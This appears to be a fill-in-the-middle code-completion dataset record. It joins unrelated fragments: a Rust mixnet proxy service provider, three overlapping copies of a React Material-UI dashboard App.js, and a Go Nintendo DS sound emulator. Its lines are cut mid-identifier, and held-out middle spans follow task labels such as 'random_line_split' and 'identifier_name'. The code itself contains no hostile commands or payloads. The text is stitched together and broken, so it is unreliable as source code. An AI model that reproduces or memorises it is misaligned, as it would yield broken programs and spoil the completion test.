static ACTIVE_PROXIES: AtomicUsize = AtomicUsize::new(0);
pub struct ServiceProvider {
listening_address: String,
outbound_request_filter: OutboundRequestFilter,
open_proxy: bool,
}
impl ServiceProvider {
pub fn new(listening_address: String, open_proxy: bool) -> ServiceProvider {
let allowed_hosts = HostsStore::new(
HostsStore::default_base_dir(),
PathBuf::from("allowed.list"),
);
let unknown_hosts = HostsStore::new(
HostsStore::default_base_dir(),
PathBuf::from("unknown.list"),
);
let outbound_request_filter = OutboundRequestFilter::new(allowed_hosts, unknown_hosts);
ServiceProvider {
listening_address,
outbound_request_filter,
open_proxy,
}
}
/// Listens for any messages from `mix_reader` that should be written back to the mix network
/// via the `websocket_writer`.
async fn mixnet_response_listener(
|
mut mix_reader: mpsc::UnboundedReceiver<(Response, Recipient)>,
) {
// TODO: wire SURBs in here once they're available
while let Some((response, return_address)) = mix_reader.next().await {
// make 'request' to native-websocket client
let response_message = ClientRequest::Send {
recipient: return_address,
message: response.into_bytes(),
with_reply_surb: false,
};
let message = Message::Binary(response_message.serialize());
websocket_writer.send(message).await.unwrap();
}
}
async fn read_websocket_message(
websocket_reader: &mut SplitStream<TSWebsocketStream>,
) -> Option<ReconstructedMessage> {
while let Some(msg) = websocket_reader.next().await {
let data = msg
.expect("we failed to read from the websocket!")
.into_data();
// try to recover the actual message from the mix network...
let deserialized_message = match ServerResponse::deserialize(&data) {
Ok(deserialized) => deserialized,
Err(err) => {
error!(
"Failed to deserialize received websocket message! - {}",
err
);
continue;
}
};
let received = match deserialized_message {
ServerResponse::Received(received) => received,
ServerResponse::Error(err) => {
panic!("received error from native client! - {}", err)
}
_ => unimplemented!("probably should never be reached?"),
};
return Some(received);
}
None
}
async fn start_proxy(
conn_id: ConnectionId,
remote_addr: String,
return_address: Recipient,
controller_sender: ControllerSender,
mix_input_sender: mpsc::UnboundedSender<(Response, Recipient)>,
) {
let mut conn = match Connection::new(conn_id, remote_addr.clone(), return_address).await {
Ok(conn) => conn,
Err(err) => {
error!(
"error while connecting to {:?} ! - {:?}",
remote_addr.clone(),
err
);
// inform the remote that the connection is closed before it even was established
mix_input_sender
.unbounded_send((Response::new(conn_id, Vec::new(), true), return_address))
.unwrap();
return;
}
};
// Connect implies it's a fresh connection - register it with our controller
let (mix_sender, mix_receiver) = mpsc::unbounded();
controller_sender
.unbounded_send(ControllerCommand::Insert(conn_id, mix_sender))
.unwrap();
let old_count = ACTIVE_PROXIES.fetch_add(1, Ordering::SeqCst);
info!(
"Starting proxy for {} (currently there are {} proxies being handled)",
remote_addr,
old_count + 1
);
// run the proxy on the connection
conn.run_proxy(mix_receiver, mix_input_sender).await;
// proxy is done - remove the access channel from the controller
controller_sender
.unbounded_send(ControllerCommand::Remove(conn_id))
.unwrap();
let old_count = ACTIVE_PROXIES.fetch_sub(1, Ordering::SeqCst);
info!(
"Proxy for {} is finished (currently there are {} proxies being handled)",
remote_addr,
old_count - 1
);
}
fn handle_proxy_connect(
&mut self,
controller_sender: &mut ControllerSender,
mix_input_sender: &mpsc::UnboundedSender<(Response, Recipient)>,
conn_id: ConnectionId,
remote_addr: String,
return_address: Recipient,
) {
if !self.open_proxy && !self.outbound_request_filter.check(&remote_addr) {
log::info!("Domain {:?} failed filter check", remote_addr);
return;
}
let controller_sender_clone = controller_sender.clone();
let mix_input_sender_clone = mix_input_sender.clone();
// and start the proxy for this connection
tokio::spawn(async move {
Self::start_proxy(
conn_id,
remote_addr,
return_address,
controller_sender_clone,
mix_input_sender_clone,
)
.await
});
}
fn handle_proxy_send(
&self,
controller_sender: &mut ControllerSender,
conn_id: ConnectionId,
data: Vec<u8>,
closed: bool,
) {
controller_sender
.unbounded_send(ControllerCommand::Send(conn_id, data, closed))
.unwrap()
}
fn handle_proxy_request(
&mut self,
raw_request: &[u8],
controller_sender: &mut ControllerSender,
mix_input_sender: &mpsc::UnboundedSender<(Response, Recipient)>,
) {
// try to treat each received mix message as a service provider request
let deserialized_request = match Request::try_from_bytes(raw_request) {
Ok(request) => request,
Err(err) => {
error!("Failed to deserialized received request! - {}", err);
return;
}
};
match deserialized_request {
Request::Connect {
conn_id,
remote_addr,
return_address,
} => self.handle_proxy_connect(
controller_sender,
mix_input_sender,
conn_id,
remote_addr,
return_address,
),
Request::Send(conn_id, data, closed) => {
self.handle_proxy_send(controller_sender, conn_id, data, closed)
}
}
}
/// Start all subsystems
pub async fn run(&mut self) {
let websocket_stream = self.connect_websocket(&self.listening_address).await;
// split the websocket so that we could read and write from separate threads
let (websocket_writer, mut websocket_reader) = websocket_stream.split();
// channels responsible for managing messages that are to be sent to the mix network. The receiver is
// going to be used by `mixnet_response_listener`
let (mix_input_sender, mix_input_receiver) = mpsc::unbounded::<(Response, Recipient)>();
// controller for managing all active connections
let (mut active_connections_controller, mut controller_sender) = Controller::new();
tokio::spawn(async move {
active_connections_controller.run().await;
});
// start the listener for mix messages
tokio::spawn(async move {
Self::mixnet_response_listener(websocket_writer, mix_input_receiver).await;
});
println!("\nAll systems go. Press CTRL-C to stop the server.");
// for each incoming message from the websocket... (which in 99.99% cases is going to be a mix message)
loop {
let received = match Self::read_websocket_message(&mut websocket_reader).await {
Some(msg) => msg,
None => {
error!("The websocket stream has finished!");
return;
}
};
let raw_message = received.message;
// TODO: here be potential SURB (i.e. received.reply_SURB)
self.handle_proxy_request(&raw_message, &mut controller_sender, &mix_input_sender)
}
}
// Make the websocket connection so we can receive incoming Mixnet messages.
async fn connect_websocket(&self, uri: &str) -> TSWebsocketStream {
let ws_stream = match websocket::Connection::new(uri).connect().await {
Ok(ws_stream) => {
info!("* connected to local websocket server at {}", uri);
ws_stream
}
Err(WebsocketConnectionError::ConnectionNotEstablished) => {
panic!("Error
|
mut websocket_writer: SplitSink<TSWebsocketStream, Message>,
|
random_line_split
|
App.js
|
from '@material-ui/icons/ChevronLeft';
import MenuIcon from '@material-ui/icons/Menu';
import SearchIcon from '@material-ui/icons/Search';
import AccountCircle from '@material-ui/icons/AccountCircle';
import NotificationsIcon from '@material-ui/icons/Notifications';
import ArrowDropDownIcon from '@material-ui/icons/ArrowDropDown';
import ListItems from './listItems.js'; // IMPORTS THE LIST ITEMS
import IMAGEN from './img/Imagen.js';
import {useHistory} from "react-router-dom";
import { BrowserRouter as Router, Route, Switch} from 'react-router-dom';
import ProdumarDuran from './Pages/ProdumarDuran.js';
import ProdumarTaura from './Pages/ProdumarTaura.js';
import Inicio from './Pages/Inicio.js';
import Registro_CLIENTE from './components/formularios/Registro_CLIENTE.js';
import Registro_Camaronera from './components/formularios/Registro_Camaronera.js';
|
let theme = createMuiTheme({
palette: {
primary: {
light: '#63ccff',
main: '#009be5',
dark: '#006db3',
},
},
typography: {
h5: {
fontWeight: 500,
fontSize: 26,
letterSpacing: 0.5,
},
},
shape: {
borderRadius: 8,
},
props: {
MuiTab: {
disableRipple: true,
},
},
mixins: {
toolbar: {
minHeight: 48,
},
},
});
theme = {
...theme,
overrides: {
MuiDrawer: {
paper: {
backgroundColor: '#212121', // Changes the color of the options menu
},
},
MuiButton: {
label: {
textTransform: 'none',
},
contained: {
boxShadow: 'none',
'&:active': {
boxShadow: 'none',
},
},
},
MuiTabs: {
root: {
marginLeft: theme.spacing(1),
},
indicator: {
height: 3,
borderTopLeftRadius: 3,
borderTopRightRadius: 3,
backgroundColor: theme.palette.common.white,
},
},
MuiTab: {
root: {
textTransform: 'none',
margin: '0 16px',
minWidth: 0,
padding: 0,
[theme.breakpoints.up('md')]: {
padding: 0,
minWidth: 0,
},
},
},
MuiIconButton: {
root: {
padding: theme.spacing(1),
},
},
MuiTooltip: {
tooltip: {
borderRadius: 4,
},
},
MuiDivider: {
root: {
backgroundColor: '#404854',
},
},
MuiListItemText: {
primary: {
fontWeight: theme.typography.fontWeightMedium,
},
},
MuiListItemIcon: {
root: {
color: 'inherit',
marginRight: 0,
'& svg': {
fontSize: 20,
},
},
},
MuiAvatar: {
root: {
width: 32,
height: 32,
},
},
},
};
const drawerWidth = 240;
const useStyles = makeStyles((theme) =>({
tabs: {
borderLeft: `1px solid ${theme.palette.divider}`,
marginLeft: 1,
},
search: {
position: 'relative',
flexGrow: 1,
borderRadius: theme.shape.borderRadius,
backgroundColor: fade(theme.palette.common.white, 0.15),
'&:hover': {
backgroundColor: fade(theme.palette.common.white, 0.25),
},
marginLeft: 0,
width: '100%',
[theme.breakpoints.up('sm')]: {
marginLeft: theme.spacing(1),
width: 'auto',
},
},
searchIcon: {
padding: theme.spacing(0, 2),
height: '100%',
position: 'absolute',
pointerEvents: 'none',
display: 'flex',
alignItems: 'center',
justifyContent: 'center',
},
inputRoot: {
color: 'inherit',
},
inputInput: {
padding: theme.spacing(1, 1, 1, 0),
// vertical padding + font size from searchIcon
paddingLeft: `calc(1em + ${theme.spacing(4)}px)`,
transition: theme.transitions.create('width'),
width: '100%',
[theme.breakpoints.up('sm')]: {
width: '17.5ch',
'&:focus': {
width: '33ch',
},
},
},
root: {
display: 'flex',
},
toolbar:{
paddingRight:24, //keep right padding when drawer closed
},
toolbarIcon: {
display: 'flex',
alignItems: 'center',
justifyContent: 'flex-end',
padding: '0 8px',
...theme.mixins.toolbar,
},
appBar:{
height:'7%',
zIndex: theme.zIndex.drawer + 1,
transition: theme.transitions.create(['width','margin'],{
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.leavingScreen,
}),
},
appBarShift:{
marginLeft: drawerWidth,
height:'7%',
width: `calc(100% - ${drawerWidth}px)`,
transition: theme.transitions.create(['width','margin'],{
easing:theme.transitions.easing.sharp,
duration: theme.transitions.duration.enteringScreen,
}),
},
menuButton: {
marginRight: 36,
},
menuButtonHidden: {
display: 'none',
},
drawerPaper: {
color : 'primary',
position: 'relative',
whiteSpace: 'nowrap',
width: drawerWidth,
transition: theme.transitions.create('width', {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.enteringScreen,
}),
},
drawerPaperClose: {
color : 'primary',
overflowX: 'hidden',
transition: theme.transitions.create('width', {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.leavingScreen,
}),
width: theme.spacing(7),
[theme.breakpoints.up('sm')]: {
width: theme.spacing(6.4),
},
},
appBarSpacer: theme.mixins.toolbar,
content: {
flexGrow: 1,
maxWidth:'400vh',
height: '100vh',
overflow: 'auto',
background: 'linear-gradient(45deg, #eceff1 70%, #212121 100%)',
},
}));
function App(props) {
const classes = useStyles();
const [auth] = React.useState(true);
const [open,setOpen]= React.useState(true);
const [anchorEl,setAnchorEl] = React.useState(null);
const op = Boolean(anchorEl);
const handleMenu = (event) => {
setAnchorEl(event.currentTarget);
};
const handleClose = () => {
setAnchorEl(null);
};
const handleDrawerOpen = () => {
setOpen(true);
};
const handleDrawerClose = () =>{
setOpen(false);
};
let history = useHistory();
return (
<ThemeProvider theme={theme}>
<Router>
<div className={classes.root}>
<CssBaseline />
<AppBar position="absolute" color ="#fafafa" className={clsx(classes.appBar, open && classes.appBarShift)}>
<Toolbar className={classes.toolbar}>
<IconButton
edge="start"
color="inherit"
aria-label="open drawer"
onClick={handleDrawerOpen}
className={clsx(classes.menuButton, open && classes.menuButtonHidden)}
>
<MenuIcon />
</IconButton>
<div className={classes.search}>
<div className={classes.searchIcon}>
<SearchIcon />
</div>
<InputBase
placeholder="Buscar transacciones, facturas, ayuda…"
classes={{
root: classes.inputRoot,
input: classes.inputInput,
}}
inputProps={{ 'aria-label': 'search' }}
/>
</div>
<IconButton color="inherit" >
<Badge variant="dot" color="secondary">
<NotificationsIcon />
</Badge>
</IconButton>
<Box p={0.5} component="h1" variant="h6" color="inherit" noWrap className={classes.tabs} >
<Typography>
Produmar
<IconButton color = "inherit">
<ArrowDropDownIcon />
</IconButton>
</Typography>
</Box>
{auth && (
<div>
<IconButton
aria-label="account of current user"
aria-controls="menu-appbar"
aria-haspopup="true"
onClick={handleMenu}
color="inherit"
>
<AccountCircle />
</IconButton>
<Menu
id="menu-appbar"
anchorEl={anchorEl}
anchorOrigin={{
vertical: 'top',
horizontal: 'right',
}}
keepMounted
|
import Registro_Operador from './components/formularios/Registro_Operador.js';
import Registro_Cosechadora from './components/formularios/Registro_Cosechadora.js';
|
random_line_split
|
App.js
|
'@material-ui/icons/ChevronLeft';
import MenuIcon from '@material-ui/icons/Menu';
import SearchIcon from '@material-ui/icons/Search';
import AccountCircle from '@material-ui/icons/AccountCircle';
import NotificationsIcon from '@material-ui/icons/Notifications';
import ArrowDropDownIcon from '@material-ui/icons/ArrowDropDown';
import ListItems from './listItems.js'; // IMPORTS THE LIST ITEMS
import IMAGEN from './img/Imagen.js';
import {useHistory} from "react-router-dom";
import { BrowserRouter as Router, Route, Switch} from 'react-router-dom';
import ProdumarDuran from './Pages/ProdumarDuran.js';
import ProdumarTaura from './Pages/ProdumarTaura.js';
import Inicio from './Pages/Inicio.js';
import Registro_CLIENTE from './components/formularios/Registro_CLIENTE.js';
import Registro_Camaronera from './components/formularios/Registro_Camaronera.js';
import Registro_Operador from './components/formularios/Registro_Operador.js';
import Registro_Cosechadora from './components/formularios/Registro_Cosechadora.js';
let theme = createMuiTheme({
palette: {
primary: {
light: '#63ccff',
main: '#009be5',
dark: '#006db3',
},
},
typography: {
h5: {
fontWeight: 500,
fontSize: 26,
letterSpacing: 0.5,
},
},
shape: {
borderRadius: 8,
},
props: {
MuiTab: {
disableRipple: true,
},
},
mixins: {
toolbar: {
minHeight: 48,
},
},
});
theme = {
...theme,
overrides: {
MuiDrawer: {
paper: {
backgroundColor: '#212121', // Changes the color of the options menu
},
},
MuiButton: {
label: {
textTransform: 'none',
},
contained: {
boxShadow: 'none',
'&:active': {
boxShadow: 'none',
},
},
},
MuiTabs: {
root: {
marginLeft: theme.spacing(1),
},
indicator: {
height: 3,
borderTopLeftRadius: 3,
borderTopRightRadius: 3,
backgroundColor: theme.palette.common.white,
},
},
MuiTab: {
root: {
textTransform: 'none',
margin: '0 16px',
minWidth: 0,
padding: 0,
[theme.breakpoints.up('md')]: {
padding: 0,
minWidth: 0,
},
},
},
MuiIconButton: {
root: {
padding: theme.spacing(1),
},
},
MuiTooltip: {
tooltip: {
borderRadius: 4,
},
},
MuiDivider: {
root: {
backgroundColor: '#404854',
},
},
MuiListItemText: {
primary: {
fontWeight: theme.typography.fontWeightMedium,
},
},
MuiListItemIcon: {
root: {
color: 'inherit',
marginRight: 0,
'& svg': {
fontSize: 20,
},
},
},
MuiAvatar: {
root: {
width: 32,
height: 32,
},
},
},
};
const drawerWidth = 240;
const useStyles = makeStyles((theme) =>({
tabs: {
borderLeft: `1px solid ${theme.palette.divider}`,
marginLeft: 1,
},
search: {
position: 'relative',
flexGrow: 1,
borderRadius: theme.shape.borderRadius,
backgroundColor: fade(theme.palette.common.white, 0.15),
'&:hover': {
backgroundColor: fade(theme.palette.common.white, 0.25),
},
marginLeft: 0,
width: '100%',
[theme.breakpoints.up('sm')]: {
marginLeft: theme.spacing(1),
width: 'auto',
},
},
searchIcon: {
padding: theme.spacing(0, 2),
height: '100%',
position: 'absolute',
pointerEvents: 'none',
display: 'flex',
alignItems: 'center',
justifyContent: 'center',
},
inputRoot: {
color: 'inherit',
},
inputInput: {
padding: theme.spacing(1, 1, 1, 0),
// vertical padding + font size from searchIcon
paddingLeft: `calc(1em + ${theme.spacing(4)}px)`,
transition: theme.transitions.create('width'),
width: '100%',
[theme.breakpoints.up('sm')]: {
width: '17.5ch',
'&:focus': {
width: '33ch',
},
},
},
root: {
display: 'flex',
},
toolbar:{
paddingRight:24, //keep right padding when drawer closed
},
toolbarIcon: {
display: 'flex',
alignItems: 'center',
justifyContent: 'flex-end',
padding: '0 8px',
...theme.mixins.toolbar,
},
appBar:{
height:'7%',
zIndex: theme.zIndex.drawer + 1,
transition: theme.transitions.create(['width','margin'],{
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.leavingScreen,
}),
},
appBarShift:{
marginLeft: drawerWidth,
height:'7%',
width: `calc(100% - ${drawerWidth}px)`,
transition: theme.transitions.create(['width','margin'],{
easing:theme.transitions.easing.sharp,
duration: theme.transitions.duration.enteringScreen,
}),
},
menuButton: {
marginRight: 36,
},
menuButtonHidden: {
display: 'none',
},
drawerPaper: {
color : 'primary',
position: 'relative',
whiteSpace: 'nowrap',
width: drawerWidth,
transition: theme.transitions.create('width', {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.enteringScreen,
}),
},
drawerPaperClose: {
color : 'primary',
overflowX: 'hidden',
transition: theme.transitions.create('width', {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.leavingScreen,
}),
width: theme.spacing(7),
[theme.breakpoints.up('sm')]: {
width: theme.spacing(6.4),
},
},
appBarSpacer: theme.mixins.toolbar,
content: {
flexGrow: 1,
maxWidth:'400vh',
height: '100vh',
overflow: 'auto',
background: 'linear-gradient(45deg, #eceff1 70%, #212121 100%)',
},
}));
function App(props) {
|
return (
<ThemeProvider theme={theme}>
<Router>
<div className={classes.root}>
<CssBaseline />
<AppBar position="absolute" color ="#fafafa" className={clsx(classes.appBar, open && classes.appBarShift)}>
<Toolbar className={classes.toolbar}>
<IconButton
edge="start"
color="inherit"
aria-label="open drawer"
onClick={handleDrawerOpen}
className={clsx(classes.menuButton, open && classes.menuButtonHidden)}
>
<MenuIcon />
</IconButton>
<div className={classes.search}>
<div className={classes.searchIcon}>
<SearchIcon />
</div>
<InputBase
placeholder="Buscar transacciones, facturas, ayuda…"
classes={{
root: classes.inputRoot,
input: classes.inputInput,
}}
inputProps={{ 'aria-label': 'search' }}
/>
</div>
<IconButton color="inherit" >
<Badge variant="dot" color="secondary">
<NotificationsIcon />
</Badge>
</IconButton>
<Box p={0.5} component="h1" variant="h6" color="inherit" noWrap className={classes.tabs} >
<Typography>
Produmar
<IconButton color = "inherit">
<ArrowDropDownIcon />
</IconButton>
</Typography>
</Box>
{auth && (
<div>
<IconButton
aria-label="account of current user"
aria-controls="menu-appbar"
aria-haspopup="true"
onClick={handleMenu}
color="inherit"
>
<AccountCircle />
</IconButton>
<Menu
id="menu-appbar"
anchorEl={anchorEl}
anchorOrigin={{
vertical: 'top',
horizontal: 'right',
}}
keepMounted
transform
|
const classes = useStyles();
const [auth] = React.useState(true);
const [open,setOpen]= React.useState(true);
const [anchorEl,setAnchorEl] = React.useState(null);
const op = Boolean(anchorEl);
const handleMenu = (event) => {
setAnchorEl(event.currentTarget);
};
const handleClose = () => {
setAnchorEl(null);
};
const handleDrawerOpen = () => {
setOpen(true);
};
const handleDrawerClose = () =>{
setOpen(false);
};
let history = useHistory();
|
identifier_body
|
App.js
|
'@material-ui/icons/ChevronLeft';
import MenuIcon from '@material-ui/icons/Menu';
import SearchIcon from '@material-ui/icons/Search';
import AccountCircle from '@material-ui/icons/AccountCircle';
import NotificationsIcon from '@material-ui/icons/Notifications';
import ArrowDropDownIcon from '@material-ui/icons/ArrowDropDown';
import ListItems from './listItems.js'; // IMPORTS THE LIST ITEMS
import IMAGEN from './img/Imagen.js';
import {useHistory} from "react-router-dom";
import { BrowserRouter as Router, Route, Switch} from 'react-router-dom';
import ProdumarDuran from './Pages/ProdumarDuran.js';
import ProdumarTaura from './Pages/ProdumarTaura.js';
import Inicio from './Pages/Inicio.js';
import Registro_CLIENTE from './components/formularios/Registro_CLIENTE.js';
import Registro_Camaronera from './components/formularios/Registro_Camaronera.js';
import Registro_Operador from './components/formularios/Registro_Operador.js';
import Registro_Cosechadora from './components/formularios/Registro_Cosechadora.js';
let theme = createMuiTheme({
palette: {
primary: {
light: '#63ccff',
main: '#009be5',
dark: '#006db3',
},
},
typography: {
h5: {
fontWeight: 500,
fontSize: 26,
letterSpacing: 0.5,
},
},
shape: {
borderRadius: 8,
},
props: {
MuiTab: {
disableRipple: true,
},
},
mixins: {
toolbar: {
minHeight: 48,
},
},
});
theme = {
...theme,
overrides: {
MuiDrawer: {
paper: {
backgroundColor: '#212121', // Changes the color of the options menu
},
},
MuiButton: {
label: {
textTransform: 'none',
},
contained: {
boxShadow: 'none',
'&:active': {
boxShadow: 'none',
},
},
},
MuiTabs: {
root: {
marginLeft: theme.spacing(1),
},
indicator: {
height: 3,
borderTopLeftRadius: 3,
borderTopRightRadius: 3,
backgroundColor: theme.palette.common.white,
},
},
MuiTab: {
root: {
textTransform: 'none',
margin: '0 16px',
minWidth: 0,
padding: 0,
[theme.breakpoints.up('md')]: {
padding: 0,
minWidth: 0,
},
},
},
MuiIconButton: {
root: {
padding: theme.spacing(1),
},
},
MuiTooltip: {
tooltip: {
borderRadius: 4,
},
},
MuiDivider: {
root: {
backgroundColor: '#404854',
},
},
MuiListItemText: {
primary: {
fontWeight: theme.typography.fontWeightMedium,
},
},
MuiListItemIcon: {
root: {
color: 'inherit',
marginRight: 0,
'& svg': {
fontSize: 20,
},
},
},
MuiAvatar: {
root: {
width: 32,
height: 32,
},
},
},
};
const drawerWidth = 240;
const useStyles = makeStyles((theme) =>({
tabs: {
borderLeft: `1px solid ${theme.palette.divider}`,
marginLeft: 1,
},
search: {
position: 'relative',
flexGrow: 1,
borderRadius: theme.shape.borderRadius,
backgroundColor: fade(theme.palette.common.white, 0.15),
'&:hover': {
backgroundColor: fade(theme.palette.common.white, 0.25),
},
marginLeft: 0,
width: '100%',
[theme.breakpoints.up('sm')]: {
marginLeft: theme.spacing(1),
width: 'auto',
},
},
searchIcon: {
padding: theme.spacing(0, 2),
height: '100%',
position: 'absolute',
pointerEvents: 'none',
display: 'flex',
alignItems: 'center',
justifyContent: 'center',
},
inputRoot: {
color: 'inherit',
},
inputInput: {
padding: theme.spacing(1, 1, 1, 0),
// vertical padding + font size from searchIcon
paddingLeft: `calc(1em + ${theme.spacing(4)}px)`,
transition: theme.transitions.create('width'),
width: '100%',
[theme.breakpoints.up('sm')]: {
width: '17.5ch',
'&:focus': {
width: '33ch',
},
},
},
root: {
display: 'flex',
},
toolbar:{
paddingRight:24, //keep right padding when drawer closed
},
toolbarIcon: {
display: 'flex',
alignItems: 'center',
justifyContent: 'flex-end',
padding: '0 8px',
...theme.mixins.toolbar,
},
appBar:{
height:'7%',
zIndex: theme.zIndex.drawer + 1,
transition: theme.transitions.create(['width','margin'],{
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.leavingScreen,
}),
},
appBarShift:{
marginLeft: drawerWidth,
height:'7%',
width: `calc(100% - ${drawerWidth}px)`,
transition: theme.transitions.create(['width','margin'],{
easing:theme.transitions.easing.sharp,
duration: theme.transitions.duration.enteringScreen,
}),
},
menuButton: {
marginRight: 36,
},
menuButtonHidden: {
display: 'none',
},
drawerPaper: {
color : 'primary',
position: 'relative',
whiteSpace: 'nowrap',
width: drawerWidth,
transition: theme.transitions.create('width', {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.enteringScreen,
}),
},
drawerPaperClose: {
color : 'primary',
overflowX: 'hidden',
transition: theme.transitions.create('width', {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.leavingScreen,
}),
width: theme.spacing(7),
[theme.breakpoints.up('sm')]: {
width: theme.spacing(6.4),
},
},
appBarSpacer: theme.mixins.toolbar,
content: {
flexGrow: 1,
maxWidth:'400vh',
height: '100vh',
overflow: 'auto',
background: 'linear-gradient(45deg, #eceff1 70%, #212121 100%)',
},
}));
function A
|
props) {
const classes = useStyles();
const [auth] = React.useState(true);
const [open,setOpen]= React.useState(true);
const [anchorEl,setAnchorEl] = React.useState(null);
const op = Boolean(anchorEl);
const handleMenu = (event) => {
setAnchorEl(event.currentTarget);
};
const handleClose = () => {
setAnchorEl(null);
};
const handleDrawerOpen = () => {
setOpen(true);
};
const handleDrawerClose = () =>{
setOpen(false);
};
let history = useHistory();
return (
<ThemeProvider theme={theme}>
<Router>
<div className={classes.root}>
<CssBaseline />
<AppBar position="absolute" color ="#fafafa" className={clsx(classes.appBar, open && classes.appBarShift)}>
<Toolbar className={classes.toolbar}>
<IconButton
edge="start"
color="inherit"
aria-label="open drawer"
onClick={handleDrawerOpen}
className={clsx(classes.menuButton, open && classes.menuButtonHidden)}
>
<MenuIcon />
</IconButton>
<div className={classes.search}>
<div className={classes.searchIcon}>
<SearchIcon />
</div>
<InputBase
placeholder="Buscar transacciones, facturas, ayuda…"
classes={{
root: classes.inputRoot,
input: classes.inputInput,
}}
inputProps={{ 'aria-label': 'search' }}
/>
</div>
<IconButton color="inherit" >
<Badge variant="dot" color="secondary">
<NotificationsIcon />
</Badge>
</IconButton>
<Box p={0.5} component="h1" variant="h6" color="inherit" noWrap className={classes.tabs} >
<Typography>
Produmar
<IconButton color = "inherit">
<ArrowDropDownIcon />
</IconButton>
</Typography>
</Box>
{auth && (
<div>
<IconButton
aria-label="account of current user"
aria-controls="menu-appbar"
aria-haspopup="true"
onClick={handleMenu}
color="inherit"
>
<AccountCircle />
</IconButton>
<Menu
id="menu-appbar"
anchorEl={anchorEl}
anchorOrigin={{
vertical: 'top',
horizontal: 'right',
}}
keepMounted
|
pp(
|
identifier_name
|
sound.go
|
loop := int((ch.SndCnt.Value >> 27) & 3)
if ch.SndCnt.Value&(1<<15) != 0 {
panic("hold")
}
v.on = false // will put true at the end of the function, if no error
v.mem = ptr[:length]
v.pos = 0
v.delay = 3
v.tmr = uint32(ch.SndTmr.Value)
v.mode = mode
v.loop = loop
var sum uint64
switch v.mode {
case kModeAdpcm:
v.delay = 11
sum = crc64.Checksum(v.mem, ctable)
if buf, found := snd.cache.Get(sum); found {
v.mem = buf.([]byte)
} else {
v.mem = snd.adpcmDecompress(v.mem)
// go ioutil.WriteFile(fmt.Sprintf("%x.raw", sum), v.mem, 0666)
snd.cache.Add(sum, v.mem)
}
case kModePsgNoise:
v.delay = 1
if idx >= 8 && idx <= 13 {
// Mode PSG
v.mem = psgTable[(ch.SndCnt.Value>>24)&3][:]
} else {
log.ModSound.WithField("ch", idx).Error("unsupported PSG/noise mode on this channel")
return
}
}
if ch.SndCnt.Value&(1<<15) != 0 {
panic("hold value")
}
log.ModSound.InfoZ("start channel").
Int("ch", idx).
Int("mode", mode).
Hex32("rpos", ch.SndSad.Value).
Uint32("len", length).
Uint("ptlen", uint(ch.SndPnt.Value)*4).
Hex64("sum", sum).
Int("loop", loop).
Hex16("tmr", ch.SndTmr.Value).
Int64("clk", nds7.Cycles()).
End()
v.on = true
}
func (snd *HwSound) stopChannel(idx int) {
v := &snd.voice[idx]
v.on = false
snd.Ch[idx].SndCnt.Value &^= 1 << 31
log.ModSound.InfoZ("stop channel").Int("idx", idx).End()
}
func (snd *HwSound) loopChannel(idx int) uint {
if snd.voice[idx].loop == kLoopInfinite {
off := snd.Ch[idx].SndPnt.Value * 4
switch snd.voice[idx].mode {
case kModeAdpcm:
off -= 4
fallthrough
case kMode16bit:
off /= 2
}
return uint(off)
}
return kPosNoLoop
}
func (snd *HwSound) WriteSNDCAP0CNT(old, new uint8) { snd.writeSNDCAPCNT(0, old, new) }
func (snd *HwSound) WriteSNDCAP1CNT(old, new uint8) { snd.writeSNDCAPCNT(1, old, new) }
func (snd *HwSound) w
|
idx int, old, new uint8) {
if (old^new)&(1<<7) != 0 {
if new&(1<<7) != 0 {
snd.startCapture(idx, new)
} else {
snd.stopCapture(idx, new)
}
}
}
func (snd *HwSound) startCapture(idx int, cnt uint8) {
cap := &snd.capture[idx]
cap.on = true
cap.loop = cnt&(1<<2) == 0
cap.bit8 = cnt&(1<<3) != 0
cap.single = cnt&(1<<1) != 0
cap.add = cnt&(1<<1) != 0
cap.wpos = *cap.regdad
cap.reset = uint32(snd.Ch[idx*2+1].SndTmr.Value)
cap.tmr = cap.reset
log.ModSound.InfoZ("start capture").
Int("idx", idx).
Bool("loop", cap.loop).
Bool("8bit", cap.bit8).
Bool("single", cap.single).
Bool("add", cap.add).
Hex32("wpos", cap.wpos).
Hex32("wlen", *cap.reglen*4).
Hex16("tmr", uint16(cap.reset)).
Int64("clk", nds7.Cycles()).
End()
}
func (snd *HwSound) stopCapture(idx int, cnt uint8) {
cap := &snd.capture[idx]
cap.on = false
}
var (
voldiv = [4]uint32{0, 1, 2, 4}
adpcmIndexTable = [8]int16{-1, -1, -1, -1, 2, 4, 6, 8}
adpcmTable = [89]uint16{
0x0007, 0x0008, 0x0009, 0x000A, 0x000B, 0x000C, 0x000D, 0x000E, 0x0010, 0x0011, 0x0013, 0x0015,
0x0017, 0x0019, 0x001C, 0x001F, 0x0022, 0x0025, 0x0029, 0x002D, 0x0032, 0x0037, 0x003C, 0x0042,
0x0049, 0x0050, 0x0058, 0x0061, 0x006B, 0x0076, 0x0082, 0x008F, 0x009D, 0x00AD, 0x00BE, 0x00D1,
0x00E6, 0x00FD, 0x0117, 0x0133, 0x0151, 0x0173, 0x0198, 0x01C1, 0x01EE, 0x0220, 0x0256, 0x0292,
0x02D4, 0x031C, 0x036C, 0x03C3, 0x0424, 0x048E, 0x0502, 0x0583, 0x0610, 0x06AB, 0x0756, 0x0812,
0x08E0, 0x09C3, 0x0ABD, 0x0BD0, 0x0CFF, 0x0E4C, 0x0FBA, 0x114C, 0x1307, 0x14EE, 0x1706, 0x1954,
0x1BDC, 0x1EA5, 0x21B6, 0x2515, 0x28CA, 0x2CDF, 0x315B, 0x364B, 0x3BB9, 0x41B2, 0x4844, 0x4F7E,
0x5771, 0x602F, 0x69CE, 0x7462, 0x7FFF,
}
psgTable = [8][16]uint8{
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f}, // _______-
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f}, // ______--
{0x01, 0x80, 0x
|
riteSNDCAPCNT(
|
identifier_name
|
